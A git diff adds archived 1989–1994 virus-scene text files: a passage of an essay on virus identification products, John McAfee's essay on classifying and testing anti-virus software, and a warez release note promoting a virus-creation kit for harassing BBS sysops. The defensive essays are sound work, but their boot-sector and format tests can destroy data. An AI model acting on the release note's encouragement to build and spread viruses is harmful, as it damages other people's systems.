+stand-alone).  Thus, the virus can in no way affect the product's
+operation, or even be aware of its presence.
+	
+Problem areas
+	There are some drawbacks to identification products however.
+The first problem is that these products only work for known viruses.
+That is, a virus that has been around long enough to be noticed,
+isolated, sampled, disassembled and analyzed.  This may take a
+considerable time if the virus is unobtrusive and slow to activate.
+When the virus has been discovered and analyzed, the identification
+product must be designed, implemented, packaged, marketed and
+distributed - a process that could take considerably more time.  Thus
+identification utilities will lag new virus developments by months, or
+in some cases, even years.  This time lag implies that there will
+always be new viruses, and thus new dangers, against which no
+identification utility will be effective.
+	The second problem with these products is more thorny, and
+requires a high level of product sophistication in order to resolve.  At
+issue is a phenomenon that might be called the Uncertainty Factor, and
+it is caused by the increasing tendency of hackers to collect existing
+viruses, modify them and return them to the public domain.  These
+modifications sometimes cause viruses to react differently from the ways
+in which they were originally designed, yet they may leave key
+identification attributes unchanged.
+	For example, the Jerusalem virus was originally designed to slow
+down the infected machine's processor one-half hour after an infected
+program was executed.  This slowdown was a nuisance to the user of the
+infected machine, but it severely limited the spread of the virus,
+because the virus made itself known early in the infection process and
+had limited time to replicate before being removed.  In the summer of
+1988, an unknown hacker modified the virus by changing just one
+instruction (see Figure 4).  This modification disabled the routine that
+caused the system to slowdown, and as a result, the virus became many
+times more infectious.
+	Modifications like this, and other more substantial
+modifications, are made almost daily to existing viruses.  The danger
+that these modifications pose to identification products is substantial.
+If an identification product is attempting to remove a virus that has
+infected a program differently than the way in which the product
+expects, then the results of the disinfection will be unpredictable.
+Damage to the system may result, the program may be destroyed or, in the
+worst case, the virus will still be active even though the product
+thinks it has removed it.
+	In order to minimize the risks posed by this problem,
+identification products must be designed to cross reference as many
+virus attributes as possible prior to attempting removal.  If any one of
+the expected attributes has been changed, or is missing, the product
+should notify the user of the potential problem and manual intervention
+will be required.
+
+Future Prospects
+	Identification products clearly must play a major role in the
+battle against computer viruses.  As viruses become more widespread and
+as infections become more common, the need for utilities able to
+identify and help remove viruses will become apparent.  It is probable
+that these products will become the dominant form of virus protection in
+the future.  A few technical advances, however would greatly aid their
+general acceptance.
+	One of the problems facing identification products is the time
+required to fully scan attached storage devices when searching for a
+virus.  For example, as many as ten or more minutes can be required to
+fully scan a 40 megabyte drive while looking for just one virus.
+Multiple virus checks require more time.  Because of this, it is
+impractical to perform frequent scans of the system.  This is
+unfortunate because it would be advantageous to perform a complete
+identification check of a system each time the system was booted.  This
+would provide a high degree of system security, assuming that the
+identification product was kept up to date.  More sophisticated
+algorithms for searching attached storage and creative techniques for
+multiple virus scans could alleviate the time scan problem.
+	A second desirable advance in the technology of these products
+would be the development of techniques that could identify variations of
+known viruses and still provide the capability to remove the modified
+virus.  This advance would remove a major limitation of the current
+products and would greatly increase their reliability.  Techniques for
+removing variations have already been developed for a few root viruses,
+but there currently exists no generic technique that is effective for a
+large class of viruses.  I anticipate that this hurdle will be overcome
+within a year or two.
+	A final enhancement would be the ability to fully or partially
+re- structure data that has been corrupted by a virus after it has
+activated.  Currently, infection identification products are only useful
+if they are used before a virus begins its destructive phase.  When the
+destructive phase begins, the virus may destroy critical control tables,
+data files, programs or even itself.  At this point all current virus
+products have limited usefulness.
+	It is possible in some cases, however, to reverse much of the
+destruction caused by a virus provided: 1) We know the details of the
+destruction process, and 2) The destructive phase has not gone on too
+long.  For example, one of the common PC viruses scrambles the File
+Allocation Table by reversing a number of the entries.  Since we know
+the exact way in which the virus scrambles the information, we can
+easily unscramble it.  However, after a few days of data scrambling, the
+virus initiates a low level format of the hard disk.  At this point, no
+recovery is possible.
+	I anticipate that future products will incorporate recovery
+capabilities for a large number of virus destructive acts.  This
+capability, and others described above, should provide the best virus
+protection that we can hope to achieve.
diff --git a/textfiles.com/virus/illegal.nfo b/textfiles.com/virus/illegal.nfo
new file mode 100644
index 00000000..a53b8dec
--- /dev/null
+++ b/textfiles.com/virus/illegal.nfo
@@ -0,0 +1,36 @@
+
+         ��������        ��������        �������        ����       �������
+      �  � ������ �      �      � ������ �    �� �      � �� ����� � ��� �
+      �  � ������ �      � ������ �      � ��� � �      � ��   �   � ��� �
+      �� �  ����� ��     �   ���� ��  �� �     � ��     �  �   ��  �     �
+      �� �  ����� ��     �  ����� ��   � �  �� � ��     �  �   ��  ���  ��
+      �� �      � ������ �      � ������ �  �� � ������ �  �   ��  ���  ��
+         ��������        ��������        �������        ����       �������
+
+                       � THe uNSTOPPaBLe CRiMe MaCHiNe �
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-
+
+                             įRELEASE�INFOMATION��
+
+    File name : [.IL-SMG03.ZIP..............................................]
+   Created by : [.Dr.d00M...................................................]
+         Date : [.11/12/94..................................................]
+
+    Special Intruction : [.Really piss people off with this one.............]
+
+   General Instruction : [.You need to know a little bit about programming..]
+                         [.to get this one to work, but the examples make...]
+                         [.it VERY easy to make your very own virus.Just....]
+                         [.read the docs, and all will become clear.Easy....]
+                         [.to piss of people and BbS sysops you don't like,.]
+                         [.and get your name in some computer mags !!!......]
+                         [..................................................]
+
+      Greetz go out to : [.Everyn Carnate, Lucifer, The Big H, Bof..........]
+                         [.The Black Baron..................................]
+                         [..................................................]
+                         [..................................................]
+                         [..................................................]
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-
diff --git a/textfiles.com/virus/implemen.mca b/textfiles.com/virus/implemen.mca
new file mode 100644
index 00000000..642b3850
--- /dev/null
+++ b/textfiles.com/virus/implemen.mca
@@ -0,0 +1,765 @@
+
+              IMPLEMENTING ANTI-VIRAL PROGRAMS
+
+                                      Copyright (c) 1989
+                                      By John McAfee
+                                      4423 Cheeney Street
+                                      Santa Clara, CA 95054
+                                      408 988 3832
+
+     In 1988 the Computer Virus Industry Association received over
+25,000 requests for information about computer viruses from
+corporations, government agencies, special interest groups, and
+individual computer users.  Questions ranged from - "How do I know if
+my system is infected?" to - "Where can I get a copy of a virus to play
+with?"  A large number of organizations wanted to know if the CVIA
+recommended procedures or policies that would minimize infection risks
+(it does).  A smaller number requested help in setting up in-house
+anti-virus training seminars.  Some asked for help with removing an
+existing infection or with identifying the individual strain of virus
+that they had discovered.  Others wanted to know why a particular virus
+infection kept recurring.  A few wanted to know whether or not viruses
+really existed (is it all media hype?).  One apparently legitimate
+caller wanted to know if any cases of human infections had been
+recorded - the winner in the imaginative question category.   
+     Within this body of requests, however, were two questions which
+have become the two most frequently asked (and most difficult to
+answer) questions concerning computer viruses.  They are: "How can you
+tell whether or not a particular anti-viral program really works?" and
+"How do these products function?".  
+     At first glance, the answer to the first question seems obvious -
+test it and see.  Just how, though, is not entirely clear to the
+average computer user.  A person seriously trying to put together a
+test plan for validating anti-viral products will be faced with some
+staggering problems.  Imagine yourself with such an assignment.  The
+first problem that might come to mind is where to find a few dozen
+viruses that can be used as a test bed.  Next (assuming that someone
+else will solve that problem or that it will otherwise go away), is how
+to go about running these viruses in a test environment without
+infecting your entire organization.   
+     If you overcome these first obstacles, you will then come face to
+face with the real issues:  How do you measure the degree of the
+product's effectiveness, considering the fact that all viruses affect
+the computer system differently, and many show no measurable impact for
+months, or even years, after the initial infection?   How do you test a
+product against "generic" viruses - that is - viruses that may not have
+been written yet but against which the product claims to be effective? 
+(There are, by the way, effective generic anti-viral products).  How do
+you even verify that a given virus has or has not infected the system
+during a test?  Many viruses leave no externally visible trail - not
+even the size of the infected program will change.  Additionally, many
+viruses have anti-detection mechanisms built in that make it extremely
+difficult to find the virus after an infection.  
+     These are just a few of the problems that will crop up during the
+development of an anti-viral product test plan.  And the problems will
+not be helped by the slim likelihood of achieving points one and two
+above:  You will likely find it difficult to acquire a test bed of live
+viruses and if you do, it is unlikely that you can carry out a
+successful extended test without endangering the rest of the
+organization.  Experience has shown us that virus containment is a
+tricky task.  They are extremely difficult to detect without special
+tools and they spread very quickly.  Even if a completely isolated
+environment is used for testing, there will, from time to time, be a
+requirement to carry potentially infectious media into and out of the
+environment. The propensity for human error being what it is, a leak is
+virtually guaranteed given enough time or enough participants. 
+     There have been well meaning, but generally flawed attempts to
+solve some of the above problems through the development of virus
+simulators and specialized tools designed to validate anti-viral
+products.   Most of the available utilities, however, were designed by
+the very people who manufacture and market the anti-virals, and their
+objectivity might be open to question.  A second problem with these
+utilities is that not all virus activity can be simulated.  Every new
+virus uses a different technique for trapping interrupts, bypassing the
+operating system or attaching to an application.  Additionally, its
+technique for activating or causing damage will differ, and its basic
+replication mechanism will be unique.  Because of these problems, the
+validation programs have limited utility.  
+     Does this mean the task is hopeless?  Not at all.  It simply
+means that some education is in order.  The first thing needed is an
+understanding of just how anti-viral products work.  By understanding
+what these products do, we can better address the question - "how
+effective are they?". 
+
+Types of Products
+     The virus problem has typically been addressed in one of three
+ways by individual antiviral programs:
+
+     1.   By preventing generic viruses from initially infecting a
+          system.  These products are not keyed to any particular
+          virus.  They work by preventing any activity that could
+          modify a program or executable segment of the system.
+
+     2.   By detecting a generic infection after it has occurred. 
+          These products also are not keyed to any particular virus. 
+          They look for any modification that may have occurred to any
+          executable component of the system.
+
+     3.   By identifying specific viral strain infections and,
+          usually, removing them.  These products are effective only
+          against known viruses.
+
+     There has been much confusion about the relative utility of virus
+products due to a limited understanding of the above categories.  Some
+critics, for instance, have stated that anti-viral products have
+limited utility because they only work against known viruses.  This
+statement is valid, however, only for the third category of products. 
+These products have been designed primarily to help remove existing
+infections and their benefit is apparent to anyone who has been
+infected and had used such products to clean their system.  All of the
+more common virus strains are addressed by these products and a user's
+chances of acquiring a product that can fight a given infection are
+fairly good.  Most such products list the specific viruses that they
+can remove.  
+     Another common misconception involves the "Vaccines".  These
+products "inoculate" programs with a self test mechanism that can
+identify changes to the program.  They are frequently thought of as
+prevention products because the word "vaccinate" connotes a preventive
+measure in general medicine.  These products, however, are in reality
+infection detection products.  They work only AFTER the program has
+become infected.  Reviewers have frequently (and erroneously) pointed
+out that such products don't work because they didn't prevent a given
+infection.  
+     Likewise, infection prevention products have been panned because
+they were unable to "identify" a pre-existing infection.    This
+confusion has reached a pinnacle in some of the organized efforts to
+formally evaluate anti-viral products.  The test criteria for a product
+designed to remove an existing virus infection must be radically
+different from the test criteria for products designed to prevent the
+infection from occurring, and these criteria in turn will not be
+applicable to infection detection products.  Yet numerous evaluations
+have been performed in which all three product types were judged by the
+same criteria.  The results, to some minds at least, were completely
+meaningless.  
+     It must be understood that each product category is designed for
+different purposes, and is intended to be applied to different virus
+problem areas.  A first prerequisite to testing product effectiveness,
+therefore, would be a solid understanding of what the product was
+intended to do, and how the product goes about doing it.
+
+How They Work
+     Let's start with the infection prevention products.  These
+products are all memory resident programs that re-direct system
+interrupts so that I/O and other selected system activities can be
+monitored.  The programs then filter all activity that could indicate
+the presence of a virus and they notify the user of a potential
+infection.  Attempts to modify the boot sector, write to an executable
+program or replace a hidden file are examples of activities that would
+be intercepted and flagged by such programs.  Generally, any activity
+that appears to be an attempted modification of an executable segment
+of the system, such as a device driver, operating system module or
+application program, would be filtered. 
+     These programs are the first line of defense against viruses, and
+if properly designed and implemented, can prevent a virus from ever
+getting into a system.  Since they can catch a virus before it can
+replicate, no removal or disinfection procedure is required and the
+virus usually has no time to do any damage to the system.  These
+programs are also generic in their operation - that is, they can in
+theory catch viruses that have not yet been developed.  This is because
+all viruses must replicate, and it is the generic replication process
+(i.e. attaching to an executable segment of the system) that is
+monitored by such products.
+     These products, however, have three drawbacks which restrict the
+environments to which they can be applied and limit the effectiveness
+of their prevention abilities.
+     The first drawback is that a fair amount of technical competence
+is required in order to use them effectively.  Users must be able to
+discriminate between a legitimate program activity that is flagged by
+the product and a real virus threat.  Numerous legitimate programs may
+at times perform functions that appear to be questionable.  For
+example, some applications modify their own executable modules during
+their configuration phase.  Compilers, assemblers and linkage editors
+legitimately modify or replace executable code.  The DOS SYS command
+will legitimately modify the boot sector and operating system files. 
+These and other programs may cause the anti-viral prevention product to
+flag the activity and notify the user.  The user must then have a
+sufficient knowledge of the program or activity in process to
+determine whether to allow it to proceed or to terminate it.  Many
+system users do not have the necessary technical depth to make a valid
+decision.
+     A second drawback is the de-sensitization of the user caused by
+the false positives generated by these programs.  If the prevention
+product flags too many legitimate activities, the user becomes
+conditioned to respond to the warning messages with a "continue" reply,
+without bothering to read the specific warning content.  In many cases,
+real viruses have been detected by these products and the user ignores
+the warning message through course of habit.  
+     The third drawback to these products is that they rely on the
+virus being "well behaved" in its design structure.  That is, they
+expect the virus to perform all I/O through normal system calls or
+software interrupts.  Generally this is a reasonable
+assumption, since it is many times simpler to use the I/O
+facilities of the operating system than it is to develop your own
+basic I/O system.  It also allows the program to operate on a
+wider variety of hardware without risk of program failure.  Some
+virus designers, however, are beginning to take the extra effort,
+and run the increased risks, of interfacing directly to the
+hardware input/output devices.  By doing so, they completely
+neutralize the infection prevention products' interrupt
+monitoring.  No matter how cleverly software interrupts are
+trapped, or memory monitored, it is ineffectual if the virus
+never gives up processor control through an operating system
+call.
+     In general then, we can say that infection prevention
+products provide the advantage of stopping a virus before it can
+infect your system and thereby prevent the virus from spreading. 
+They also are effective against a large class of generic viruses. 
+They should be used, however, only by competent system users, and
+- they contain a major loophole that can be used by sophisticated
+viruses to avoid the product's protection mechanism.. 
+
+Infection Detection Products       
+     Infection detection products rely on the assumption that it
+is advantageous to discover an infection as soon as possible
+after it occurs.  Viruses remain in systems for months or even
+years prior to activating and causing system damage.  During this
+time their only activity is replication, and they take every
+precaution to remain undetected.  Viruses require this
+"unobtrusive" phase in order to have the opportunity to duplicate
+themselves onto other systems - a necessary step in the process
+of spreading.  Infection detection products, then, attempt to
+identify an infection as soon as possible after it has occurred,
+thereby limiting the spread of the virus within the organization
+and avoiding the virus destructive phase.         
+     Detection products operate in one of two ways: vaccination,
+or status logging.  Vaccination products modify the system's
+executable code (programs, device drivers, etc.) to include a
+self test mechanism.  This self test function will cause a
+warning whenever the code has been modified.  The warning will
+occur at the time the code is executed.  Status logging
+products, on the other hand, create a log file that contains all
+the information necessary to detect any questionable change in
+the system.  The file usually contains a list of checksums of the
+executable code in the system, or it may contain other such
+information that can be used to identify change.  A check
+function is then run periodically, usually at boot time, to
+evaluate the boot sector, operating system files, device drivers
+and all application programs.  If a modification is discovered, a
+warning message occurs indicating the areas of the system that
+have become infected.
+     It should be noted at this point that detection products
+will only work if the system is uninfected at the time the
+product is installed.  If an infection has already occurred, the
+virus code will be logged as part of the program it has infected
+and the compare routines will never find the discrepancy.
+     Detection products avoid the interrupt monitoring loophole
+of the prevention products.  Because, irrespective of the
+sophistication of the virus infection mechanism, some segment of
+executable code will have changed after the infection has
+occurred, and detecting this change is usually a straightforward
+process.  The  disadvantage of such products, however, is that,
+unlike prevention products, the system must actually become
+infected before the flag is raised.  Thus a disinfection process
+must be undertaken and there is also a slight risk that the virus
+will activate and cause damage before it can be detected.  
+     An additional drawback of the vaccination type of detection
+products is that many viruses cannot be detected using this
+method if they replace an entire section of code rather than
+modify it.  Boot sector viruses are a prime example.  They
+replace the boot sector with themselves.  Thus, any vaccination
+code that had been applied to the boot sector would never have an
+opportunity to execute, and no warning would ever occur.  This is
+a serious drawback of the vaccination approach.
+
+Infection Identification
+     Identification products are designed to identify and, in
+some cases, counteract specific strains of existing viruses. 
+They are not generic in function, that is - they cannot detect or
+remove viruses that are not commonly known.  They work by
+scanning the system media, looking for characteristic code
+segments, identification flags or other signs left by a given
+virus strain.  Since viruses are programs with specific functions
+and characteristics, each will have some unique discriminating
+attribute that can be used to distinguish it from the surrounding
+data and code indigenous to the system.  Finding these unique
+attributes within the system is a certain sign of infection from
+the identified virus.  
+     Identification products perform two distinct functions: 
+First, they can be used to scan a system and determine if it is
+infected with a given virus.  Using multiple identification
+products (or a single product capable of identifying multiple
+viruses), a user can determine whether any of the more common
+viruses have already infected the system.  This will provide a
+higher probability that the system is clean prior to implementing
+a prevention or generic detection product.  Second, they are
+invaluable in helping to remove an existing infection from an
+organization.  
+     One of the major difficulties in removing a virus from an
+organization that has suffered a widespread infection is
+identifying all of the programs, files, removable media and other
+elements of the system that have been affected.  Identification
+products can quickly and reliably size the scope of an infection
+and identify those elements of the system that must be
+disinfected.  In many cases the products can, in addition, repair
+any damage that has been done and restore the system to its state
+prior to the infection.  A great deal of manpower and other
+resources can thus be saved through the use of such products.
+     Identification products are limited, however, in providing 
+protection against newer viruses, or older viruses that may not
+have publicly surfaced.  In order to develop an identification
+product, the virus must first be discovered and isolated.  Then
+it must be disassembled and analyzed.  Finally an effective
+countermeasure must be designed, implemented, and distributed to
+the public.  The time lag for this process will stretch from a
+few months to a year or more.  This "window of opportunity" for
+new virus developers will be a continuing barrier for such
+products.
+
+     The three types of protection products that have been
+described above are not always clearly separable in the
+marketplace.  Some products combine two or more programs, each
+addressing a single protection area, into a single package, much
+like a set of virus utilities.  Other products may focus on a
+single type of protection but only provide a partial solution. 
+For example, there exist infection detection products that will
+only detect changes to operating system files, ignoring all other
+executable code.  All products to date, however, provide
+protection programs that can be grouped into one or more of the
+above categories.
+
+Important Features:
+     Now that we have a fair understanding of what these products
+are doing, we can address the issue of "how well do they work?". 
+Each type of product, it should be clear by now, should have a
+different set of criteria for judging performance.  Let's take a
+look at these criteria:
+
+Infection prevention criteria:
+
+     Infection prevention products should, at the minimum, be
+able to:
+     -         Differentiate between activities initiated by the user
+               and activities carried out autonomously by programs.
+               For example:  Users may frequently delete or update
+               program files or operating system segments, and this is
+               a normal system activity.  An application program, on
+               the other hand, should not, under normal circumstances,
+               modify another application program, an operating system
+               program, or the system's boot sector.  Such processes
+               are indicative of virus activity.  The infection
+               prevention product should be able to discriminate
+               between them.
+
+     -         Provide few false positives, or false alarms.  Users
+               become habituated to frequent false alarms and tend to
+               overlook a valid virus warning when it does occur.
+
+     -         Run with other memory resident programs.  Infection
+               prevention programs are all memory resident and they
+               modify a large number of software interrupts.  This
+               gives such programs a propensity for crashing or
+               hanging the system when running concurrently with other
+               memory resident programs.
+
+     -         Protect against modifications to all executable data,
+               including the following:
+
+               -    The system's boot sector
+
+               -    All system device drivers
+
+          -         All operating system modules, including hidden
+                    file programs
+
+          -         All application programs
+
+     -         Provide an easily accessible enable/disable switch. 
+               Many instances will occur where the checking process
+               will need to be temporarily suspended.  A simple on/off
+               switch is a necessity.
+
+     -         Provide the ability to selectively protect or ignore
+               specific programs or specific areas of the system. 
+               This will reduce the number of false alarms when
+               running programs which violate the "rules" imposed by
+               the product.
+
+          -    Provide the ability to freeze virus activity when it is
+               detected, and prevent the illegal access from
+               continuing.  This is mandatory to prevent the virus
+               from infecting the system.
+
+          -    Run without noticeably degrading system performance. 
+               Memory resident programs have a tendency to increase
+               system overhead and thus slow down the system.  A well
+               designed product should cause no more than a 5%
+               degradation in system performance. 
+ 
+     -         Monitor and protect all attached read/write devices. 
+               All attached devices that can be written to are
+               potential virus targets.  The prevention product should
+               protect all such devices.
+
+     -         Selectively prevent all interrupt level I/O.  An
+               additional degree of protection is provided if the
+               product disallows programs from performing non-standard
+               calls for I/O service (interrupt level requests). 
+               However, doing so increases the false alarm rate.  The
+               user should have the choice of allowing or disallowing
+               such calls.
+
+Infection detection criteria:
+
+     Infection detection products should at a minimum be able to:
+     -         Detect characteristic viral modifications to all
+               executable data, including the following:
+
+               -    The system's boot sector
+
+               -    All system device drivers
+
+          -         All operating system modules, including hidden
+                    file programs
+
+          -         All application programs
+
+     -         Allow the user to selectively exclude specific
+               programs or specific areas of storage from the checking
+               function.  This will allow programs or directories that
+               undergo frequent change to avoid causing error messages
+               during the checking process.
+
+     -         Perform global check functions in a timely fashion.  If
+               the check function is executed at boot time, for
+               example, it should add no more than 10 seconds to the
+               boot sequence for each 50 programs on the disk that
+               must be checked.
+
+     -         Provide automatic checking.  The check function should
+               execute at least each time the system is powered on or
+               re-booted.  Some systems provide a clock function so
+               that the system can be checked automatically at user
+               specified time intervals. 
+
+     -         Stop the system, provide a visual and audible warning,
+               and wait for user directions if a potential virus is
+               detected.
+
+     -         Display the names of all infected programs, or clearly
+               identify the areas of the system that have become
+               infected.
+
+Infection Identification
+
+     Infection Identification products should be able to:
+     -         Identify and remove multiple virus strains.  The number
+               of existing viruses continues to increase.  So, when an
+               infection occurs, it is not always possible to
+               positively identify the infection strain.  The more
+               viruses that the product can distinguish, the better
+               the chances of identification.
+
+     -         Provide information that will allow the user to
+               determine how accurate the diagnosis may be.  In some
+               circumstances, identifying a given virus is not as
+               precise as one might think.  This is because many
+               viruses have been slightly modified by unknown hackers
+               and re-introduced into the public domain.  These
+               modified viruses can sometimes only be detected by
+               cross referencing many different characteristics.  The
+               product should provide the degree of certainty, or
+               other information that can be used to determine a
+               course of action, for any questionable virus. 
+
+          -    Identify and report on all areas of the system that are
+               infected.  It is important to know the extent of
+               infection, and the product should provide that
+               information.
+
+          -    Inform the user about the degree of success for the
+               removal.  Depending on the time that the virus has been
+               in the system, removal may or may not be possible.  The
+               product should inform the user of possible options in a
+               questionable situation.  The options available should
+               include automatic removal or erasure of the affected
+               system element.
+
+     -         Scan and remove the infection from all attached
+               devices.  This should include floppies, fixed and
+               removable hard disks and tape devices.
+
+     -         Automatically scan all subdirectories.  The product
+               should be capable of locating all areas of the system
+               where the infection may have lodged, without user
+               assistance.
+
+     -         Flag all areas of the system where removal was
+               partially or completely ineffective.  These areas must
+               be manually dealt with after the program finishes.
+
+     -         Prevent itself from becoming infected during the
+               identification and removal process.  This is a real
+               danger for many of the identification products.  An
+               infected identification product will run the risk of
+               infected every system on which it is used.
+
+
+Testing Procedures
+
+     Now that we have seen how these products work and we have
+been exposed to the central criteria for evaluating them, we are
+ready to begin the actual testing.  The effectiveness of these
+products can usually be determined without having to use
+specialized tools.  All that's required is a word processor or
+text editor, a good disk utility such as the Norton Utilities, a
+knowledge of common operating system commands and a sound
+understanding of the issues we've discussed so far.
+     The test procedures that are recommended below will possibly
+not provide the degree of product assurance that could be
+ascertained by experienced virus specialists testing in a
+laboratory and using live viruses.  They will, however, provide a
+great deal more information about the product's performance than
+could be gleaned from reading the product documentation or sales
+literature.  They will also provide more information than quite a
+few of the published product reviews that have been performed, if
+only because you will gain hands on experience with the product
+in your operating environment.  Any product that performs well in
+the following tests is guaranteed to provide some degree of real
+protection.   
+     Let's start with the infection prevention products:
+
+Infection Prevention Product Testing:
+
+     These products, remember, are basically filter programs that
+monitor the system and try to prevent viruses from initially
+infecting programs or other executable components.  The testing
+should determine how well the products protect these system
+elements from modification.  The tests should also determine how
+sensitive these products are to valid system activities that
+might trigger a virus warning.  The ideal product will catch all
+truly questionable activities while ignoring all normal system
+activities.  The following procedures will provide a good
+indication of the product's effectiveness:  (Be sure to install
+the antiviral product prior to running these tests).
+
+I.  Program modification test
+     To test the product's ability to protect general executable
+programs from being modified, create a temporary subdirectory and
+copy your word processor or text editor into the subdirectory. 
+Create two output text file named TEST, one with a .EXE
+extension and the other with a .COM extension.  Then attempt to
+update the file using the word processor or a text editor.  If
+the antiviral program is working properly, it should flag both
+the creation and the update as a potential infection.  Next
+create output files named IBMBIO.COM, IBMDOS.COM and
+COMMAND.COM.  Attempt to modify them.  Each attempt should be
+prevented.  Finally, create output files with the same names as
+each of the installable device drivers in your system.  (check
+your CONFIG.SYS file to determine the names of your device
+drivers if you do not already know them).  Attempt to modify each
+of them.  Each attempt should be prevented.
+     Repeat each of the above steps using a floppy diskette as
+the output device, instead of the hard disk subdirectory.  The
+same results should occur.
+
+II.  Interrupt level I/O test
+     Next, we need to test the product's ability to prevent
+interrupt level I/O.  To do this, first copy the FORMAT routine
+to a file named TEST.COM.  Run TEST and format a floppy diskette
+in the A or B drive.  The antiviral program should prevent the
+format and flag the attempt.  
+
+III. Operating system command test
+     We next need to check the use of operating system commands. 
+User commands are frequently, and erroneously, flagged by
+antiviral products when they instigate operations that mimic
+virus activities.  It is important to select a product that can
+discriminate between activities instigated by the user and those
+that occur through program processes.  To test this capability we
+use some standard DOS commands.  
+     Using standard COPY, DELETE and RENAME commands, copy an
+executable program into a different directory, rename it to
+another EXE or COM file name, and then delete it.  None of the
+three operations should be flagged by the antiviral program.
+
+IV. Copy, rename and delete test
+      Next we should verify that the above functions would be
+stopped if performed by a program, rather than by the system
+user.  Using any application utility program that has copy,
+rename and delete functions (such as X-TREE, Norton Utilities,
+etc.), repeat the above series of steps.  The antiviral program
+should prevent and flag all three attempts as potential viral
+activities.
+
+V. Self modification test
+     Many programs modify their own executable modules at some
+point.  This is not characteristic of viruses, and the process
+can in no way lead to the spread of the virus.  The antiviral
+program should not flag or prevent any attempts of a program to
+modify itself.  To test this, copy your word processor executable
+module to a backup file.  Then run the word processor, create a
+dummy document, and then save it to the name of the executable
+word processor module (for example, using Word Perfect, you would
+save the file to the name - WP.EXE).  The antiviral program
+should allow the modification.  After this test, copy the saved
+version of the program back to its original name.
+
+VI. Boot sector test
+     Attempt to modify the boot sector to check the product's
+ability to prevent the attempt.  It is very important in this
+step that you be able to restore the boot sector in the event
+that the product's protection mechanism fails.  
+     Using any utility that allows reading and writing the boot
+sector (the Norton Utilities is an example), read the boot sector
+and write down the contents of the first byte.  Change the first
+byte to 00 and attempt to write the sector back to disk.  The
+product should prevent the attempt.  If the product fails,
+replace the original contents of the first byte and re-write the
+boot sector.  The re-write should be performed prior to shutting
+down or re-booting the system.
+
+VII. Memory resident check
+     Many viruses modify the original structure of programs so
+that they remain memory resident after they terminate.  The
+antiviral product should detect any attempt to remain resident. 
+To test this feature, merely take any normally memory resident
+program, such as SIDEKICK or CACHE, and rename it to the file
+TEST.COM (or .EXE, depending on the program).  Run TEST.  The
+product should catch the program and display a warning message.
+
+
+     In addition to the above tests, you should create a
+checklist of the product criteria discussed in the previous
+section and review such functions as the enable/disable switch,
+selective protection and other issues identified.
+
+Infection Detection Product Testing
+     These products identify an infection after it has occurred. 
+Testing should focus on detecting modifications to executable
+components of the system, such as the boot sector, the operating
+system or an application program.  
+     Before we describe the test procedures, however, a note of
+explanation about how viruses attach to programs is necessary. 
+Viruses can attach to the beginning, to the end or to the middle
+of a program, or any combination of the three. They may fragment
+themselves and scatter virus segments throughout the program.  Or
+they may even keep the main body of the virus unattached to the
+program, hidden in a bad sector for example.  All viruses that
+have been discovered, however, have modified at least some small
+portion of the beginning instructions of the program.  This is
+because a virus must be executed first, that is - before the host
+program to which it has attached.  If the virus does not execute
+before its host program, then the environment in which the virus
+"wakes up" will be uncertain, and the possibility of program
+failure will be high.  
+     The exceptions to the this "positioning" rule are viruses
+that replace the entire program, such as boot sector infectors,
+and viruses that attack only specific programs, like known
+operating system files or other programs that would be commonly
+found in large numbers of systems.  These viruses may gain
+control at any point, since the structure of the host program is
+well known and the environment can be predicted at any point in
+the host program's processing.
+     The implications of this virus attachment profile are very
+important:  Many detection products make use of this profile to
+speed the system checking function.  If every byte of every
+program is processed in the checksum or other comparison
+technique, then global checking functions (scanning the entire
+system) may take substantial time to complete.  Systems
+containing many hundreds of large programs (a common occurence),
+may require anywhere from 5 to 15 minutes to complete the audit. 
+Since a global scan should be performed at least daily, this time
+requirement is a significant nuisance to the average user and a
+deterrent for the implementation of the product.  Products that
+only look for the characteristic initial instruction
+modifications, on the other hand, would complete the same audit
+in a matter of seconds.
+     All products, however, should perform a complete check of
+"universal" programs.  These include the boot sector, the
+operating system files and the command interpreter.
+     Armed with this information, we are now ready to begin the
+tests:
+
+I. Boot sector replacement
+     Using a disk utility program, blank out the "Boot Failure"
+message within the boot sector (this is merely a safe way to
+create a unique boot sector).  Then install the detection product
+you wish to test.  Next, replace the entire boot sector using the
+SYS command (see the DOS user's guide for instructions on using
+this command).  Then execute the check function of the product
+you are testing.  The product should warn that the new boot
+sector is a replacement.
+II. Boot modification
+     Next, re-install the detection product.  Then modify the
+boot sector randomly using the disk utility.  Run the check
+routine.  The product should warn that the boot sector has been
+modified.  (When finished with this step, perform the SYS
+command again, or use the disk utility to return the boot sector
+to its original state).
+III.  Program deletion
+     Copy a number of COM and EXE files to a temporary directory
+and then delete them from their original directories.  Run the
+detection check function.  The product should identify each of
+the missing programs. 
+IV.  Program modification
+     Next, copy the programs back from the temporary directory to
+their original directories.  Using your disk utility, modify the
+first byte of each of the COM programs.  Modify the entire first
+500 bytes of the EXE programs.  Run the check program.  Each
+modification should be detected.
+     At this point you should replace each of the modified
+programs from the original programs stored in the temporary
+directory.
+V. Program replacement
+     Replace one of the application programs with the origional
+program from the program distribution diskette.  Then modify the
+program as above.  The check function should still catch the
+modification.
+VI.  System modification
+     Using your disk utility, copy COMMAND.COM, IBMBIO.COM and
+IBMDOS.COM to backup files.  Randomly modify each of the original
+files using your disk utility.  Change only one byte in each. 
+Run the check routine to determine that the modifications have
+been detected.  Perform this step multiple times with different
+modifications.
+
+     In addition to the above tests, you should create a
+checklist of the product criteria discussed in the previous
+section and review such functions as selective protection,
+automatic checking, visual warnings and other issues identified.
+          
+Infection Identification products
+     It is virtually impossible to test these products in the
+absence of a real infection, so I will assume that you would be
+evaluating such a product in order to rid yourself of an actual
+infection.  I do not recommend that you obtain samples of real
+viruses in order to test these products.     
+     The ultimate test for these products is: Did it identify and
+remove the infection, and if so, how thouroughly?  Performing the
+test is quite simple.
+     The first steps are to isolate the infected system from all
+other systems, and to aquire clean, original copies of the
+infected programs.  Make working copies of these uninfected
+programs onto separate floppy diskettes, one sample program per
+diskette.
+     Insert each floppy in turn into the infected system and run
+each sample program.  This, in most cases, will cause the
+diskette, or the program, to become infected.  
+     Using  a disk utility, now do a binary compare of the
+infected diskette to the backup copy.  If an infection has
+occurred, the diskettes will differ.  Separate all working copy
+diskettes that have been modified by the virus and label them as
+infected.
+     Now run the identification program against each of the
